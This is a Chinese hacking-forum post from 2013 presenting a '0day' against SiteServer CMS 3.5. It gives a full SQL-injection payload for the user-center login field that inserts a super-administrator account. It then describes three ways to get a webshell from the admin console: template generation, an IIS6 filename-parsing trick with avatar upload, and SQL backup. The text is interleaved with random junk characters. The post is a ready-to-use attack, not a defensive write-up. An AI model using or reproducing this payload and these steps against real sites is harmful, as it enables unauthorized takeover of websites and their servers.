找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2018|回复: 0
打印 上一主题 下一主题

SiteServer CMS 0Day

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:10:58 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
经测试秒杀最新的3.5版, _$ s8 ~4 y" n. d

6 z" W/ D- V' d  o/ Zstieserver官网:www.siteserver.cn
6 G) B& d! f! }# g4 h# t; f
) U& \% d0 c% ^% R7 t
: R1 V) I4 L! I9 ~* A+ `9 j% y+ X0 s+ s
EXP:. {, w# f: O8 ?* [

  o# u. \  p7 |3 ^4 |" e直接访问UserCenter/login.aspx5 y8 p  _% C1 c
7 N# V8 g' p) R2 C) `% t# E

, f( F" v4 j) N9 }7 u% J5 ^* v. ?/ }! m: P0 N! Z
用户名处输入:
8 ~4 m7 g( _2 b4 d7 ^# B; \0 M, p8 O3 ?, R2 R9 V! D' L: C
123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--( y4 @, Y0 b" U: p3 F! |, P6 N
! O+ ~8 h, i, P) i2 u5 ]

3 D" g+ G  m1 R& C1 [" _: g! m1 S' b* z7 ]$ m4 w. p+ I! Q
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。/ K8 s2 J( J  C' V
5 D% Q0 t* r. `  y) J6 d
% ?% |( O& N3 I% ~# x- O  {) X" N

8 A7 S, ?2 ]0 F) [之后再访问后台SiteServer/login.aspx用插入的用户登陆3 G4 p2 |* f' Q( @% m

. N3 g5 z. H/ q, w- ~+ v0 j& [; |: Z 4 L. k& K- Z+ h' H9 j
% K3 B3 `) @8 M
后台拿webshell的三种方法:( V, \( ~" Z& d# @2 B  |* m
& N1 C0 S  q3 a1 @, T
一、' x; A4 k5 P+ b, E, m  J
+ q* {1 T8 i' F) U; r) X+ O. u; V
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx5 g3 X: L  W! L' t0 V- S" ~( j1 E

+ ?. l( H1 i9 }" O8 v' ~/ O二、8 w- {; D) V2 C4 w! w( @

+ F7 ?! w3 l" w, F成员权限-》添加用户-》用户名为:1.asp% o3 X3 E  [6 @; ~- X' n

0 l1 @! A2 c- k/ U7 I/ {http://127.0.0.1/usercenter/7 u- P% H$ K/ e8 @& z3 L
( M% D: U7 u3 k7 T8 c3 ~- d# X. ~
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
1 r! A' u$ V" N4 k
0 ^: ~& b' l2 e+ O(ps:后台添加用户时不会验证是否含有非法字符)
0 f! [  k! z9 s: l' s
6 R! R7 s; [! ?& T三、8 r; w1 f* Z( o& w  m( n& ]( C& {( A

2 z: c, M  k5 F! k$ n2 v系统工具-》实用工具-》机器参数查看& p. N) g5 r- A+ M" L- H
可以看到数据库类型、名称,WEB路径
- M3 y8 G, u) w6 }. j4 p# S3 Z2 C
系统工具-》数据库工具-》SQL语句查询
! y8 ?$ j, l1 \% L! ]1 L. X这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。
4 [0 ^" I2 n9 U* o5 Z. @1 w
- P: h# N/ I7 G1 ~
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表